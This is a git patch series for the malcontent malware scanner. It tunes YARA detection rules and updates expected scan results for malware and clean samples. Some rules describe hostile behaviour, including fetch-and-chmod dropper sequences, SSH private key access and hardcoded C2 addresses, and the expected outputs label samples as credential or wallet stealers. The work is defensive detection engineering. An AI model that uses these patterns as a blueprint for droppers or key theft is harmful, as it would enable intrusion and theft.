[target](https://github.com/search?q=target&type=code) | | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | diff --git a/tests/macOS/clean/ls.sdiff.level_2 b/tests/macOS/clean/ls.sdiff.level_2 index fa0ab56fa..f2fe90892 100644 --- a/tests/macOS/clean/ls.sdiff.level_2 +++ b/tests/macOS/clean/ls.sdiff.level_2 @@ -1,3 +1,4 @@ --- missing: ls.x86_64 +-lateral/scan/tool -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index 9e0e93a9c..3ed486b6c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -3,6 +3,7 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read +-lateral/scan/tool -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index 9e0e93a9c..3ed486b6c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -3,6 +3,7 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read +-lateral/scan/tool -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple index fbaac975e..20bc9d6e8 100644 --- a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple +++ b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple @@ -1,7 +1,7 @@ # npm/2024.legacyreact-aws-s3-typescript/package.json: critical c2/tool_transfer/npm: critical c2/tool_transfer/shell: high -evasion/hidden_paths/relative_hidden: low +exec/program/hidden: low exec/shell/background_launcher: high exfil/npm: high fs/file/make_executable: medium diff --git a/tests/php/clean/composer-2.7.7.simple b/tests/php/clean/composer-2.7.7.simple index 912b8d72f..3732878d1 100644 --- a/tests/php/clean/composer-2.7.7.simple +++ b/tests/php/clean/composer-2.7.7.simple @@ -22,7 +22,7 @@ discover/system/hostname_get: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/hijack_execution/DYLD_LIBRARY_PATH: medium exec/cmd: medium exec/plugin: low diff --git a/tests/php/clean/run-tests.php.simple b/tests/php/clean/run-tests.php.simple index 55d7d2da0..d6586237e 100644 --- a/tests/php/clean/run-tests.php.simple +++ b/tests/php/clean/run-tests.php.simple @@ -18,6 +18,7 @@ fs/symlink_resolve: low fs/tempdir: low fs/tempdir/TEMP: low impact/remote_access/reverse_shell: medium +lateral/scan/tool: medium net/http/cookies: medium net/http/form_upload: medium net/http/post: medium diff --git a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple index 27cd557ff..a382541db 100644 --- a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple +++ b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple @@ -5,7 +5,7 @@ discover/network/interface_list: medium discover/system/network: high discover/system/platform: medium discover/user/name_get: high -evasion/hidden_paths/hidden: high +evasion/file/prefix: high exec/cmd/pipe: medium exec/program: medium exec/shell/command: medium diff --git a/tests/python/2023.JokerSpy/shared.dat.simple b/tests/python/2023.JokerSpy/shared.dat.simple index b6a0be7c5..4717f624a 100644 --- a/tests/python/2023.JokerSpy/shared.dat.simple +++ b/tests/python/2023.JokerSpy/shared.dat.simple @@ -9,7 +9,7 @@ discover/network/interface_list: medium discover/system/network: high discover/system/platform: medium discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/program: medium exec/remote_commands/code_eval: medium exec/tty/getpass: low diff --git a/tests/python/clean/numpy/misc_util.py.simple b/tests/python/clean/numpy/misc_util.py.simple index dc993294a..6907bcce7 100644 --- a/tests/python/clean/numpy/misc_util.py.simple +++ b/tests/python/clean/numpy/misc_util.py.simple @@ -1,7 +1,7 @@ # python/clean/numpy/misc_util.py: medium anti-static/obfuscation/python: medium discover/system/platform: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/install_additional/pip_install: medium exec/program: medium exec/remote_commands/code_eval: medium diff --git a/tests/windows/2024.aspdasdksa2/creal.exe.simple b/tests/windows/2024.aspdasdksa2/creal.exe.simple index d6c10054b..7705f417c 100644 --- a/tests/windows/2024.aspdasdksa2/creal.exe.simple +++ b/tests/windows/2024.aspdasdksa2/creal.exe.simple @@ -18,6 +18,7 @@ fs/file/delete: medium fs/file/read: low fs/file/write: low fs/path/relative: medium +lateral/scan/tool: medium net/dns/txt: low net/url/embedded: low net/url/parse: low diff --git a/tests/windows/2024.aspdasdksa2/creal.pyc.simple b/tests/windows/2024.aspdasdksa2/creal.pyc.simple index 35c4226f7..fae239ad2 100644 --- a/tests/windows/2024.aspdasdksa2/creal.pyc.simple +++ b/tests/windows/2024.aspdasdksa2/creal.pyc.simple @@ -26,6 +26,7 @@ exfil/stealer/credit_card: medium exfil/stealer/creds: high exfil/stealer/discord: high exfil/stealer/wallet: critical +lateral/scan/tool: medium net/download: medium net/download/fetch: medium net/http/fake_user_agent: medium From 960782bbc405e0e7c94569df9629ea3a44c3e0eb Mon Sep 17 00:00:00 2001 From: Thomas Stromberg Date: Sat, 9 Nov 2024 16:31:42 -0500 Subject: [PATCH 2/7] address more Ubuntu high false-positive --- pkg/action/testdata/scan_archive | 1 - .../{packer/elf.yara => elf/content.yara} | 20 +---- rules/anti-static/elf/entropy.yara | 8 +- rules/anti-static/elf/header.yara | 19 ++++ rules/anti-static/elf/tiny.yara | 9 ++ rules/anti-static/{binary => macho}/tiny.yara | 9 -- rules/anti-static/obfuscation/bitwise.yara | 4 +- rules/anti-static/obfuscation/python.yara | 3 +- rules/c2/addr/ip.yara | 13 +-- rules/c2/addr/url.yara | 36 ++++++-- rules/c2/tool_transfer/shell.yara | 9 +- rules/credential/ssh/ssh.yara | 21 ++++- .../process/effective-groupid-get.yara | 0 .../process/effective-userid-get.yara | 0 rules/{ => discover}/process/limit-get.yara | 0 rules/{ => discover}/process/name-get.yara | 0 .../process/parent_pid-get.yara | 0 rules/{ => discover}/process/pid-get.yara | 0 .../{ => discover}/process/priority-get.yara | 0 rules/discover/process/runtime_deps.yara | 27 ++++++ rules/{ => discover}/process/userid-get.yara | 0 .../process/working_directory-get.yara | 0 .../evasion/file/location/chdir-unusual.yara | 3 +- .../{odd_pidfile.yara => pidfile.yara} | 0 .../file/location/system_directories.yara | 14 --- .../file/location/system_directory.yara | 15 ++++ .../{tmp_x11-unix.yara => x11-unix.yara} | 6 +- rules/evasion/file/prefix/lib.yara | 2 +- rules/evasion/file/prefix/prefix.yara | 2 + .../hijack_execution/etc-ld.so.preload.yara | 2 +- rules/evasion/logging/hide_shell_history.yara | 1 - rules/evasion/logging/historical_logins.yara | 2 +- rules/evasion/mimicry/fake-library.yara | 6 +- rules/evasion/net/http_443.yara | 2 +- rules/evasion/rootkit/linux_kernel.yara | 2 +- rules/exec/shell/nohup.yara | 15 ---- rules/exec/shell/sighup_trap.yara | 14 +++ rules/false_positives/libdw.yara | 10 +++ rules/false_positives/linux_src.yara | 1 + rules/false_positives/sudo.yara | 2 +- rules/false_positives/vmtools.yara | 6 +- .../permission-modify-dangerous.yara | 2 +- rules/fs/proc/pid-exe.yara | 30 +++++-- rules/hw/dev/sd_mmc.yara | 18 +++- rules/hw/dev/ubi.yara | 11 +++ rules/impact/degrade/firewall.yara | 2 +- rules/impact/exploit/exploit.yara | 13 ++- rules/impact/remote_access/backdoor.yara | 4 +- rules/impact/remote_access/listen_shell.yara | 7 +- rules/impact/remote_access/net_term.yara | 19 ++-- rules/lateral/scan/scan_tool.yara | 12 +-- rules/net/download/fetch.yara | 1 + .../persist/kernel_module/symbol-lookup.yara | 14 +++ rules/process/thread_local_storage.yara | 11 --- tests/does-nothing/does-nothing.simple | 1 - .../lottie-player.min.js.mdiff | 3 +- .../clean/203.b7219352.chunk.js.simple | 1 - ...4796BB27126E03A7E25DD5D589.cache.js.simple | 4 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 4 +- tests/javascript/clean/connection.js.simple | 1 - tests/javascript/clean/faker.js.simple | 2 - tests/javascript/clean/faker.min.js.simple | 2 - .../clean/frequency_lists.js.simple | 1 - tests/javascript/clean/mode-php.js.simple | 4 +- .../clean/mode-php_laravel_blade.js.simple | 4 +- tests/javascript/clean/php.js.simple | 4 +- .../clean/securityDashboards.plugin.js.simple | 1 - tests/javascript/clean/zxcvbn.js.simple | 1 - tests/linux/2021.FontOnLake/45E9.elf.simple | 3 +- tests/linux/2021.XMR-Stak/1b1a56.elf.simple | 2 +- .../2022.bpfdoor/2023.ConnectBack/tiny.md | 1 - tests/linux/2022.bpfdoor/bpfdoor_2.simple | 1 - tests/linux/2022.ez-pwnkit/payload.simple | 1 - tests/linux/2023.ConnectBack/tiny.md | 1 - .../2023.Gafgyt/5636cddb43.elf.x86.simple | 1 + .../wyoming-xray-undress-robert.simple | 1 + .../eight-nebraska-autumn-illinois.simple | 1 - tests/linux/2024.Mirai/ppc.simple | 1 - .../uranus-ack-mike-cat.simple | 1 - tests/linux/2024.chisel/crondx.simple | 1 - ...4084b7471bc5aed1c81803054f017240a72.simple | 1 - tests/linux/2024.gas/gas.simple | 1 - tests/linux/2024.kubo_injector/injector.json | 15 +++- .../emp3r0r.agent.simple | 2 - .../2024.kworker_pretenders/gafgyt.simple | 1 - tests/linux/2024.medusa/rkload.simple | 3 +- tests/linux/UPX/06ed158.md | 2 +- tests/linux/clean/appsec-rules.json.simple | 1 - tests/linux/clean/busybox.simple | 2 +- tests/linux/clean/caddy.simple | 2 +- tests/linux/clean/chezmoi.simple | 2 +- tests/linux/clean/chrome.simple | 6 +- tests/linux/clean/clickhouse.simple | 4 +- tests/linux/clean/code-oss.md | 10 +-- tests/linux/clean/containerd.simple | 1 - tests/linux/clean/cpack.md | 4 +- tests/linux/clean/default_config.json.simple | 1 - .../kibana/securitySolution.chunk.9.js.simple | 5 +- tests/linux/clean/kuma-cp.simple | 1 - tests/linux/clean/ld-2.27.so.simple | 2 +- tests/linux/clean/libgcj.so.17.0.0.simple | 6 +- tests/linux/clean/libgcj.so.17.simple | 6 +- tests/linux/clean/libsystemd.so.0.simple | 5 +- tests/linux/clean/ls.x86_64.md | 1 - tests/linux/clean/lslogins.md | 4 +- tests/linux/clean/melange.simple | 3 +- tests/linux/clean/mongosh.simple | 5 +- tests/linux/clean/nvim.simple | 3 +- tests/linux/clean/opa.simple | 1 - tests/linux/clean/pandoc.md | 6 +- tests/linux/clean/ping.x86_64.md | 1 - tests/linux/clean/pulumi.simple | 2 +- .../clean/pypi_package_index.json.simple | 1 - tests/linux/clean/qemu-system-xtensa.md | 6 +- tests/linux/clean/redis-server.aarch64.md | 1 - tests/linux/clean/rules.json.simple | 1 - .../clean/runtime-security-fentry.o.simple | 1 - .../runtime-security-syscall-wrapper.o.simple | 1 - tests/linux/clean/runtime-security.o.simple | 1 - tests/linux/clean/searchindex.json.simple | 4 +- tests/linux/clean/slack.md | 6 +- tests/linux/clean/slirp4netns.simple | 2 +- .../clean/sonarlint-metadata.json.simple | 1 - tests/linux/clean/sudo.simple | 5 +- tests/linux/clean/tracer.o.aarch64.simple | 3 +- tests/linux/clean/tree-sitter.md | 87 +++++++++---------- tests/linux/clean/trivy.simple | 2 +- tests/linux/clean/trufflehog.md | 6 +- tests/linux/clean/viewgam.md | 1 - tests/linux/clean/wolfictl.simple | 2 +- .../mimipenguin/python/mimipenguin.simple | 2 +- tests/macOS/2024.Ezuri/libdpt1.so.simple | 1 - tests/macOS/2024.LightSpy/dropper.simple | 4 +- tests/macOS/2024.Rustdoor/localfile.simple | 1 - tests/macOS/clean/ls.mdiff | 1 - tests/macOS/clean/ls.sdiff.level_2 | 1 - tests/macOS/clean/ls.sdiff.trigger_2 | 1 - tests/macOS/clean/ls.sdiff.trigger_3 | 1 - tests/npm/2024.harthat/deference.js.simple | 2 +- .../2024.next-react-notify/tocall.js.simple | 2 +- tests/php/2024.sagsooz/2024.php.simple | 2 +- tests/php/clean/run-tests.php.simple | 1 - .../python/2021.DiscordSafety/setup.py.simple | 2 +- tests/python/2024.Custom.RAT/output.py.simple | 2 +- tests/python/clean/numpy/misc_util.py.simple | 1 + .../clean/versioneer/versioneer.py.simple | 1 + .../windows/2024.GitHub.Clipper/raw.py.simple | 2 +- .../windows/2024.aspdasdksa2/creal.exe.simple | 1 - .../windows/2024.aspdasdksa2/creal.pyc.simple | 1 - 149 files changed, 426 insertions(+), 319 deletions(-) rename rules/anti-static/{packer/elf.yara => elf/content.yara} (58%) create mode 100644 rules/anti-static/elf/tiny.yara rename rules/anti-static/{binary => macho}/tiny.yara (70%) rename rules/{ => discover}/process/effective-groupid-get.yara (100%) rename rules/{ => discover}/process/effective-userid-get.yara (100%) rename rules/{ => discover}/process/limit-get.yara (100%) rename rules/{ => discover}/process/name-get.yara (100%) rename rules/{ => discover}/process/parent_pid-get.yara (100%) rename rules/{ => discover}/process/pid-get.yara (100%) rename rules/{ => discover}/process/priority-get.yara (100%) create mode 100644 rules/discover/process/runtime_deps.yara rename rules/{ => discover}/process/userid-get.yara (100%) rename rules/{ => discover}/process/working_directory-get.yara (100%) rename rules/evasion/file/location/{odd_pidfile.yara => pidfile.yara} (100%) delete mode 100644 rules/evasion/file/location/system_directories.yara rename rules/evasion/file/location/{tmp_x11-unix.yara => x11-unix.yara} (80%) create mode 100644 rules/exec/shell/sighup_trap.yara create mode 100644 rules/false_positives/libdw.yara delete mode 100644 rules/process/thread_local_storage.yara diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index bcb250b48..1fb170804 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -74,7 +74,6 @@ fs/symlink_resolve: low fs/tempdir/tempfile_create: low fs/unmount: low impact/remote_access/heartbeat: medium -lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/rules/anti-static/packer/elf.yara b/rules/anti-static/elf/content.yara similarity index 58% rename from rules/anti-static/packer/elf.yara rename to rules/anti-static/elf/content.yara index bdee7686e..5620752d2 100644 --- a/rules/anti-static/packer/elf.yara +++ b/rules/anti-static/elf/content.yara @@ -1,4 +1,4 @@ -import "math" +import "elf" rule obfuscated_elf: high linux { meta: @@ -27,21 +27,5 @@ rule obfuscated_elf: high linux { $debuglink = ".gnu_debuglink" fullword condition: - uint32(0) == 1179403647 and none of them -} - -rule high_entropy_header: high { - meta: - description = "high entropy ELF header (>7)" - hash_2023_UPX_0c25 = "0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d" - hash_2023_UPX_5a59 = "5a5960ccd31bba5d47d46599e4f10e455b74f45dad6bc291ae448cef8d1b0a59" - hash_2023_FontOnLake_38B09D690FAFE81E964CBD45EC7CF20DCB296B4D_elf = "f155fafa36d1094433045633741df98bbbc1153997b3577c3fa337cc525713c0" - - strings: - $not_pyinst = "pyi-bootloader-ignore-signals" - $not_go = "syscall_linux.go" - $not_go2 = "vdso_linux.go" - - condition: - uint32(0) == 1179403647 and math.entropy(1200, 4096) > 7 and none of ($not*) + filesize > 512 and elf.type == elf.ET_EXEC and uint32(0) == 1179403647 and none of them } diff --git a/rules/anti-static/elf/entropy.yara b/rules/anti-static/elf/entropy.yara index 26bdc373a..72cfcf6d9 100644 --- a/rules/anti-static/elf/entropy.yara +++ b/rules/anti-static/elf/entropy.yara @@ -12,16 +12,16 @@ private rule small_elf { rule normal_elf_high_entropy_7: medium { meta: - description = "higher entropy ELF binary (>7)" + description = "higher entropy ELF binary (>7.1)" condition: - normal_elf and math.entropy(1, filesize) >= 7 + normal_elf and math.entropy(1, filesize) >= 7.1 } rule normal_elf_high_entropy_7_2: high { meta: - description = "high entropy ELF binary (>7.2)" + description = "high entropy ELF binary (>7.4)" condition: - normal_elf and math.entropy(1, filesize) >= 7.2 + normal_elf and math.entropy(1, filesize) >= 7.4 } diff --git a/rules/anti-static/elf/header.yara b/rules/anti-static/elf/header.yara index 252ca50b0..bb8f24f25 100644 --- a/rules/anti-static/elf/header.yara +++ b/rules/anti-static/elf/header.yara @@ -1,4 +1,5 @@ import "elf" +import "math" rule single_load_rwe: critical { meta: @@ -38,3 +39,21 @@ rule fake_dynamic_symbols: critical { condition: elf.type == elf.ET_EXEC and elf.entry_point < filesize and elf.number_of_sections > 0 and elf.dynamic_section_entries > 0 and for any i in (0..elf.dynamic_section_entries): (elf.dynamic[i].type == elf.DT_SYMTAB and not (for any j in (0..elf.number_of_sections): (elf.sections[j].type == elf.SHT_DYNSYM and for any k in (0..elf.number_of_segments): ((elf.segments[k].virtual_address <= elf.dynamic[i].val) and ((elf.segments[k].virtual_address + elf.segments[k].file_size) >= elf.dynamic[i].val) and (elf.segments[k].offset + (elf.dynamic[i].val - elf.segments[k].virtual_address)) == elf.sections[j].offset)))) } + + +rule high_entropy_header: high { + meta: + description = "high entropy ELF header (>7)" + hash_2023_UPX_0c25 = "0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d" + hash_2023_UPX_5a59 = "5a5960ccd31bba5d47d46599e4f10e455b74f45dad6bc291ae448cef8d1b0a59" + hash_2023_FontOnLake_38B09D690FAFE81E964CBD45EC7CF20DCB296B4D_elf = "f155fafa36d1094433045633741df98bbbc1153997b3577c3fa337cc525713c0" + + strings: + $not_pyinst = "pyi-bootloader-ignore-signals" + $not_go = "syscall_linux.go" + $not_go2 = "vdso_linux.go" + $not_module = ".module_license" fullword + + condition: + uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and math.entropy(1200, 4096) > 7 and none of ($not*) +} diff --git a/rules/anti-static/elf/tiny.yara b/rules/anti-static/elf/tiny.yara new file mode 100644 index 000000000..311e888cc --- /dev/null +++ b/rules/anti-static/elf/tiny.yara @@ -0,0 +1,9 @@ +import "elf" + +rule impossibly_small_elf_program: high { + meta: + description = "ELF binary is unusually small" + + condition: + filesize < 8192 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC +} \ No newline at end of file diff --git a/rules/anti-static/binary/tiny.yara b/rules/anti-static/macho/tiny.yara similarity index 70% rename from rules/anti-static/binary/tiny.yara rename to rules/anti-static/macho/tiny.yara index acd73140d..e36911bd8 100644 --- a/rules/anti-static/binary/tiny.yara +++ b/rules/anti-static/macho/tiny.yara @@ -1,12 +1,3 @@ -import "elf" - -rule impossibly_small_elf_program: high { - meta: - description = "ELF binary is unusually small" - - condition: - filesize < 8192 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC -} rule impossibly_small_macho_program: medium { meta: diff --git a/rules/anti-static/obfuscation/bitwise.yara b/rules/anti-static/obfuscation/bitwise.yara index 6dc723eb9..72201b846 100644 --- a/rules/anti-static/obfuscation/bitwise.yara +++ b/rules/anti-static/obfuscation/bitwise.yara @@ -30,7 +30,9 @@ rule excessive_bitwise_math: high { $not_algbase = "algbase" fullword $not_jslint = "jslint bitwise" $not_include = "#define " - + $not_bitwise = "bitwise" fullword + $not_bitmasks = "bitmasks" fullword + $not_ckbcomp = "ckbcomp" fullword condition: filesize < 192KB and #x > 64 and none of ($not*) } diff --git a/rules/anti-static/obfuscation/python.yara b/rules/anti-static/obfuscation/python.yara index dce5d126b..20567d367 100644 --- a/rules/anti-static/obfuscation/python.yara +++ b/rules/anti-static/obfuscation/python.yara @@ -261,8 +261,9 @@ rule python_hex_decimal: high { $trash = /\\x{0,1}\d{1,3}\\/ + $not_testing_t = "*testing.T" fullword condition: - filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 + filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 and none of ($not*) } rule dumb_int_compares: high { diff --git a/rules/c2/addr/ip.yara b/rules/c2/addr/ip.yara index d7f85d70d..fae0a09d4 100644 --- a/rules/c2/addr/ip.yara +++ b/rules/c2/addr/ip.yara @@ -39,7 +39,8 @@ rule elf_hardcoded_ip: high { $not_1_2_3_4 = "1.2.3.4" $not_root_servers_h = "128.63.2.53" $not_root_servers_i = "192.36.148.17" - + $not_123456789 = "123.45.67.89" + $not_libebt_among_init = "libebt_among_init" condition: filesize < 12MB and uint32(0) == 1179403647 and 1 of ($sus_ip*) and none of ($not*) } @@ -73,15 +74,17 @@ rule hardcoded_ip_port: high { strings: $ipv4 = /([1-9][0-9]{1,2}\.){3}[1-9][0-9]{1,2}:\d{2,5}/ fullword - $not_ssdp = "239.255.255.250:1900" + $not_ssdp = "239.255.255.250:" $not_2181 = "10.101.203.230:2181" - $not_meta = "169.254.169.254:80" - $not_vnc = "10.10.10.10:5900" + $not_meta = "169.254.169.254:" + $not_vnc = "10.10.10.10:" $not_azure_pgsql = "20.66.25.58:5432" $not_wireguard = "127.212.121.99:999" $not_minio = "172.16.34.31:9000" $not_test = "def test_" fullword - + $not_12 = "12.12.12.12:" + $not_21 = "21.21.21.21:" + $not_255 = "255.255.255.255:" condition: any of ($ip*) and none of ($not*) } diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara index bbdfdb214..dd456fc0f 100644 --- a/rules/c2/addr/url.yara +++ b/rules/c2/addr/url.yara @@ -25,25 +25,48 @@ rule exotic_tld: high { $not_gov_bd = ".gov.bd" $not_eol = "endoflife.date" $not_whois = "bdia.btcl.com.bd" + $not_arduino = "arduino.cc" condition: filesize < 10MB and any of ($http*) and none of ($not_*) } -rule binary_http_url_with_question: high { + + + +rule http_url_with_question: medium { meta: description = "contains hardcoded endpoint with a question mark" strings: + $f_import = "import" fullword + $f_require = "require" fullword + $f_curl = "curl" fullword + $f_wget = "wget" fullword + $f_requests = "requests.get" fullword + $f_requests_post = "requests.post" fullword + $f_urllib = "urllib.request" fullword + $f_urlopen = "urlopen" fullword $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/ $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/ $not_rev_head = "?rev=HEAD" + $not_cgi = ".cgi?" + + condition: + filesize < 256KB and any of ($f*) and $ref and none of ($not*) +} + +rule binary_php_url_with_question: high { + meta: + description = "contains hardcoded endpoint with a question mark" + strings: + $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ condition: - filesize < 150MB and elf_or_macho and $ref and none of ($not*) + filesize < 150MB and elf_or_macho and $ref } -rule script_with_binary_http_url_with_question: high { +rule script_php_url_with_question: medium { meta: description = "contains hardcoded endpoint with a question mark" @@ -56,10 +79,7 @@ rule script_with_binary_http_url_with_question: high { $f_requests_post = "requests.post" fullword $f_urllib = "urllib.request" fullword $f_urlopen = "urlopen" fullword - $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/ - $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/ - $not_rev_head = "?rev=HEAD" - + $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ condition: - filesize < 256KB and any of ($f*) and $ref and none of ($not*) + filesize < 256KB and any of ($f*) and $ref } diff --git a/rules/c2/tool_transfer/shell.yara b/rules/c2/tool_transfer/shell.yara index 3226a2d98..802c8bbda 100644 --- a/rules/c2/tool_transfer/shell.yara +++ b/rules/c2/tool_transfer/shell.yara @@ -156,11 +156,10 @@ rule fetch_chmod_execute: high { rule possible_dropper: high { meta: - description = "downloads and execute a program" + description = "download and execute a program" strings: - $http = "http://" - $https = "https://" + $http = /https{0,1}:\/\/[\.\w\/\?\=\-]{1,64}/ $tool_curl_o = /curl [\w\.\- :\"\/]{0,64}-\w{0,2}[oO][\w\.\- :\"\/]{0,64}/ $tool_wget_q = "wget -" $tool_lwp = "lwp-download" @@ -169,10 +168,10 @@ rule possible_dropper: high { $cmd_rm = "rm" fullword $cmd_sleep = "sleep" fullword $cmd_echo = "echo" fullword - $cmd_chmod = "chmod" fullword + $chmod = "chmod" fullword condition: - filesize < 1KB and any of ($http*) and any of ($tool*) and any of ($cmd*) + filesize < 1KB and any of ($http*) and $chmod and any of ($tool*) and any of ($cmd*) } rule nohup_dropper: critical { diff --git a/rules/credential/ssh/ssh.yara b/rules/credential/ssh/ssh.yara index fd0f0add5..70f1b84fd 100644 --- a/rules/credential/ssh/ssh.yara +++ b/rules/credential/ssh/ssh.yara @@ -8,14 +8,14 @@ rule ssh_folder: medium { strings: $slash = "/.ssh" - $re = /[\$\%\{\}\w\/]{0,16}\.ssh[\w\/]{0,16}/ fullword + $re = /[\~\$\%\{\}\w\/]{0,16}\.ssh[\w\/]{0,16}/ fullword $pkg = /[a-z]{2,16}\.ssh/ condition: filesize < 20MB and $slash or ($re and not $pkg) } -rule id_rsa: high { +rule id_rsa: medium { meta: description = "accesses SSH private keys" @@ -25,3 +25,20 @@ rule id_rsa: high { condition: filesize < 10MB and ssh_folder and $id_rsa } + + +rule id_rsa_not_ssh: high { + meta: + description = "non-SSH client accessing SSH private keys" + + strings: + $id_rsa = "id_rsa" fullword + $not_ssh_newkeys = "SSH_MSG" + $not_ssh_userauth = "SSH_USERAUTH" + $not_ssh_20 = "SSH-2.0" + $not_openssh = "OpenSSH" + $not_ssh2 = "SSH2" fullword + $not_SSH_AUTH_SOCK = "SSH_AUTH_SOCK" + condition: + filesize < 10MB and ssh_folder and $id_rsa and none of ($not*) +} diff --git a/rules/process/effective-groupid-get.yara b/rules/discover/process/effective-groupid-get.yara similarity index 100% rename from rules/process/effective-groupid-get.yara rename to rules/discover/process/effective-groupid-get.yara diff --git a/rules/process/effective-userid-get.yara b/rules/discover/process/effective-userid-get.yara similarity index 100% rename from rules/process/effective-userid-get.yara rename to rules/discover/process/effective-userid-get.yara diff --git a/rules/process/limit-get.yara b/rules/discover/process/limit-get.yara similarity index 100% rename from rules/process/limit-get.yara rename to rules/discover/process/limit-get.yara diff --git a/rules/process/name-get.yara b/rules/discover/process/name-get.yara similarity index 100% rename from rules/process/name-get.yara rename to rules/discover/process/name-get.yara diff --git a/rules/process/parent_pid-get.yara b/rules/discover/process/parent_pid-get.yara similarity index 100% rename from rules/process/parent_pid-get.yara rename to rules/discover/process/parent_pid-get.yara diff --git a/rules/process/pid-get.yara b/rules/discover/process/pid-get.yara similarity index 100% rename from rules/process/pid-get.yara rename to rules/discover/process/pid-get.yara diff --git a/rules/process/priority-get.yara b/rules/discover/process/priority-get.yara similarity index 100% rename from rules/process/priority-get.yara rename to rules/discover/process/priority-get.yara diff --git a/rules/discover/process/runtime_deps.yara b/rules/discover/process/runtime_deps.yara new file mode 100644 index 000000000..5abe0ebdd --- /dev/null +++ b/rules/discover/process/runtime_deps.yara @@ -0,0 +1,27 @@ +rule tls_get_addr: medium { + meta: + description = "looks up thread private variables, may be used for loaded library discovery" + ref = "https://chao-tic.github.io/blog/2018/12/25/tls" + + strings: + $val = "__tls_get_addr" fullword + + condition: + any of them +} + +import "elf" +import "math" + +rule sus_dylib_tls_get_addr: high { + meta: + description = "suspicious runtime dependency resolution" + + strings: + $val = "__tls_get_addr" fullword + $not_trampoline = "__interceptor_trampoline" + $not_glibc_private = "GLIBC_PRIVATE" + + condition: + filesize < 500KB and elf.type == elf.ET_DYN and $val and none of ($not*) and math.entropy(1, filesize) >= 6 +} diff --git a/rules/process/userid-get.yara b/rules/discover/process/userid-get.yara similarity index 100% rename from rules/process/userid-get.yara rename to rules/discover/process/userid-get.yara diff --git a/rules/process/working_directory-get.yara b/rules/discover/process/working_directory-get.yara similarity index 100% rename from rules/process/working_directory-get.yara rename to rules/discover/process/working_directory-get.yara diff --git a/rules/evasion/file/location/chdir-unusual.yara b/rules/evasion/file/location/chdir-unusual.yara index 5df099283..78b3d4d44 100644 --- a/rules/evasion/file/location/chdir-unusual.yara +++ b/rules/evasion/file/location/chdir-unusual.yara @@ -76,8 +76,9 @@ rule cd_var_subdir: high { $d_var_run = "cd /var/run" $d_var_tmp = "cd /var/tmp" + $not_var_log_packages = "cd /var/log/packages" condition: - any of ($d*) + any of ($d*) and none of ($not*) } rule cd_val_obsessive: critical { diff --git a/rules/evasion/file/location/odd_pidfile.yara b/rules/evasion/file/location/pidfile.yara similarity index 100% rename from rules/evasion/file/location/odd_pidfile.yara rename to rules/evasion/file/location/pidfile.yara diff --git a/rules/evasion/file/location/system_directories.yara b/rules/evasion/file/location/system_directories.yara deleted file mode 100644 index f70414ddd..000000000 --- a/rules/evasion/file/location/system_directories.yara +++ /dev/null @@ -1,14 +0,0 @@ -rule system_fs_manipulator: medium { - meta: - description = "Modifies files within system directories" - hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3" - hash_2023_Linux_Malware_Samples_e212 = 